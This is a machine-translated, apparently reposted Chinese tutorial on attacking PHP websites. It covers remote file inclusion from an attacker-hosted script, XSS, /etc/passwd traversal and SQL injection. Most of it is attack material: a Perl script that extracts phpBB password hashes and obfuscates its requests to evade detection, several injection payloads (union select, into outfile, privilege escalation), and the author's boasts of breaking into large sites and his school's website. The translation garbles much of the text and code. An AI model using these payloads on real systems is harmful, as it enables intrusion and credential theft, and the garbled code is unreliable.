PHP Website Vulnerability Summary _php tutorial

Source: Internet
Author: User
Tags md5 hash ord php website

From the current network security, we are most concerned about and contact the most Web page vulnerability should be ASP, in this regard, small bamboo is an expert, I have no say. However, in the case of PHP, there are also serious security issues, but there are few articles in this area. Let's just talk a little bit about the bugs in the PHP page.
I made a summary of the current common PHP vulnerabilities, broadly divided into the following: including file vulnerabilities, script command execution vulnerability, file Disclosure Vulnerability, SQL injection vulnerabilities and so on. Of course, as for the cookie deception and other common technology is not discussed here, these materials are also many online. So, Let's analyze how to exploit these loopholes.
First, let's discuss the inclusion of a file vulnerability. This loophole should be PHP alone. This is due to insufficient processing of externally supplied malicious data, which could allow remote attackers to execute arbitrary commands on the system with Web process privileges. Let's take a look at an example: Let's say that there is a code in a.php:
Include ($include. " /xxx.php\ ");
?>
In this code, $include is generally a set of paths, but we can construct a path ourselves to achieve the purpose of the attack. For example we submit: A.php? include=http://web/b.php, this web is our space for attack, of course, b.php is the code we use to attack. We can write code similar to: PassThru ("/bin/ls/etc") in b.php. , you can perform some purposeful attacks. (Note: The Web server should not be able to execute the PHP code, otherwise it will be a problem.) See more < <如何对php程序中的常见漏洞进行攻击> >). In this loophole, there are a lot of situations, for example: PayPal Store Front,
Hotnews,mambo Open source,phpdig,yabb Se,phpbb,invisionboard,solmetra spaw editor,les Visiteurs,PhpGedView, X-cart wait a few.
Next, let's take a look at the script command execution vulnerability. This is due to the lack of sufficient filtering of the URI parameters submitted by the user, the submission of data containing malicious HTML code, which can lead to triggering cross-site scripting attacks, potentially obtaining sensitive information from the target user. We also give an example: php php 4.3 in php transparent 1 The following version of the index.php page for phpsessid lack of adequate filtering, we can use this code to achieve the purpose of the attack:
Http://web/index.php? Phpsessid= "> in script we can construct functions to get some sensitive information from the user. In this loophole relatively less, in addition to PHP transparent: php-nuke,phpbb,php classifieds, Phpix,ultimate PHP board and so on.
Then we'll take a look at the file leak. The vulnerability is due to a lack of sufficient filtering of user-submitted parameters, which can be exploited by remote attackers for directory traversal attacks and for obtaining sensitive information. Let's take the example of the recently discovered phpMyAdmin. In phpMyAdmin, the export.php page does not adequately filter what the user submits, and the remote attacker commits to include multiple: /character data, you can bypass the Web root limit and view arbitrary file information on the system with Web permissions. For example, to enter such an address: export.php?what=. /.. /.. /.. /.. /.. /ETC/PASSWD%00 can achieve the purpose of file leakage. In this respect a little more, there are: Myphpnuke,mcnews and so on.
Finally, we have to go back to the most exciting place. Think of our usual in the ASP page with SQL injection is how cool, before also manually injected, until the small bamboo realized "SQL injection dense Gupta" (hehe), and then after the NBSI, we NB Alliance really pull out of the sky. has helped Csdn, Big Monopoly Forum, China channel and other large sites to find loopholes. (The nonsense is not much to say, a little off-topic ...). or the word regulation Dhamma, in fact, in the ASP SQL injection and SQL injection in PHP is roughly the same, just a little attention to the use of a few functions. change ASC to Ascii,len to length, and the other functions are basically the same. You actually see PHP SQL injection, Do you think of Php-nuke and phpBB? Good, as the saying goes tree big recruit points, such as the Forum in the ASP community such as the Web is the loophole this king, this is not to say that its forum security is too bad, but the fame is too loud, others use more, research people also more, found that the more security loopholes. PhpBB is the same, and now a large part of the people use PHP to do the forum, is generally the choice of PhpBB. Its vulnerability is also always out, from the earliest phpbb.com PhpBB 1.4.0 has been discovered by a vulnerability, to the current recent PhpBB 2.0.6 version of the groupcp.php, as well as the previously discovered search.php,profile.php,viewtopic.php and so on add up, probably also have 10. This has always led to a part of people in the study of PHP loopholes will take it as an experimental product , the so-called hundred practice into fine, believe that after the phpBB will become better.
Well, let's analyze the cause of the vulnerability. Take the viewtopic.php page, because when you call viewtopic.php, you get "topic_id" directly from the GET request and pass it to the SQL query command without some filtering processing. An attacker could submit a special SQL string for obtaining the MD5 password, which could be used for automatic login or brute force. (I don't think anyone would want to go to brute force, unless it's a particularly important reason). Take a look at the relevant source code first:
# if (isset ($HTTP _get_vars[post_topic_url))
# {
# $topic _id = intval ($HTTP _get_vars[post_topic_url]);
# }
# Else if (Isset ($HTTP _get_vars[topic]))
# {
# $topic _id = intval ($HTTP _get_vars[topic]);
# }
From the above we can see that if the submitted View=newest and SID set the value, the execution of the query code like this (if you have not seen the PhpBB source code, it is recommended that you look at the point of view, the affected system is: PhpBB 2.0.5 and PhpBB 2.0.4).

# $sql = "Select p.post_id
# from ". Posts_table. "P,". Sessions_table. "s,". Users_table. "U
# where s.session_id = $session _id
# and u.user_id = s.session_user_id
# and p.topic_id = $topic _id
# and P.post_time >= u.user_lastvisit
# ORDER by P.post_time ASC
# LIMIT 1 ";

Rick provides the following broken test code:

Use Io::socket;
$remote = Shift | | localhost
$view _topic = Shift | | /phpbb2/viewtopic.php;
$uid = Shift | | 2;
$port = 80;
$dbtype = MYSQL4; # Mysql4 or Pgsql
Print "Trying to get password hash for UID $uid server $remote dbtype: $dbtype";
$p = "";
for ($index =1; $index <=32; $index + +) {
$socket = io::socket::inet->new (peeraddr = $remote,
Peerport = $port,
Proto = "TCP",
Type = sock_stream)
Or die "couldnt connect to $remote: $port: $@";
$str = "GET $view _topic". "? Sid=1&topic_id=-1". Random_encode (Make_dbsql ()). "&view=newest". "http/1.0";
Print $socket $str;
Print $socket "cookie:phpbb2mysql_sid=1"; # Replace this for pgsql or remove it
Print $socket "Host: $remote";
while ($answer = < $socket >) {
if ($answer =~/location:.*x23 (d+)/) # Matches the location:viewtopic.php?p= # {
$p. = Chr ();
}
}
Close ($socket);
}
Print "MD5 Hash for uid $uid is $p";
# Random encode str. Helps avoid detection
sub Random_encode {
$str = shift;
$ret = "";
for ($i =0; $i $c = substr ($str, $i, 1);
$j = rand Length ($str) * 1000;
if (int ($j)% 2 | | $c eq) {
$ret. = "%". sprintf ("%x", Ord ($c));
} else {
$ret. = $c;
}
}
return $ret;
}
Sub Make_dbsql {
if ($dbtype eq mysql4) {
Return "union Select ORD (substring (User_password,"). $index. ", 1)) from phpbb_users where user_id= $uid/*";
} elsif ($dbtype eq pgsql) {
return "; Select ASCII (substring (user_password from $index to 1)) as post_id from Phpbb_posts p, phpbb_users u where u.user_id= $uid or false ";
} else {
return "";
}
}

The code is broken, I don't have to explain more. The function is to get the hash value.
See here, everyone may be a little doubt, why I said before the change of the function of how not to use, I said not afraid of everyone joke: in fact, many sites on the Web some pages of query statements will look like this:
display.php?sqlsave=select+*+ From+aaa+where+xx=yy+order+by+bbb+desc
Do not laugh, it is true, I also rely on this into several large sites. As to which some, is not good to speak out, but our school's website, I just rely on this to go backstage ( Hope that the School Network Center can not see this article, ^_^). Use the previous function. Otherwise, you'll have to change your password.!!!
Almost forget a bit, in SQL injection, PHP and ASP different, MySQL use of SQL statements is not MSSQL flexible, so many of the queries that can be used on MSSQL in the MySQL database will not work. The usual injection statements are like this: Aaa.php?id=a into outfile pass.txt or aaa.php?id=a into outfile pass.txt/* Further can be changed to: Aaa.php?id=a or 1=1 Union select Id,name , password form users into outfile c:/a.txt
This allows you to export database data to a file and then view it.
Or this: mode=,user_level=4
This statement is generally used to modify the data, assuming that the page has a loophole, you can achieve the use of elevated permissions.
Other such as or 1=1-or: 1 or 1=1 is similar to ASP. There's not much to say here. in PHP, SQL injection seems to be the top of the hole, there are too many pages exist this problem.
In fact, you can see that the above categories in the final analysis, there is only one reason: the submission parameters are not filtered or filter is not rigorous. The hacker defense has always been offensive. Here, let's talk about the precautionary approach.

First of all, I personally think that the most important point is to MAGIC_QUOTES_GPC high to ON, it is the function of the single quotation marks, double quotes, backslashes, and null characters to the characters containing backslashes, such as SELECT * from the admin where username=$ Username and password= $password statement, the attacker wants to skip validation with 1 or 1=1, but those strings will be converted to this: SELECT * from admin where username=a and password=1 or 1=1 thereby achieving the purpose of blocking injections, the fact is that the addslashes () operation is automatically performed. If you don't, you can define your own function. Now it seems that those who engage in PHP

http://www.bkjia.com/PHPjc/508215.html www.bkjia.com true http://www.bkjia.com/PHPjc/508215.html techarticle from the current network security, we are most concerned about and contact the most Web page vulnerability should be ASP, in this regard, small bamboo is an expert, I have no say. However, in terms of PHP, there is also the same ...

  • Related Article

    Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.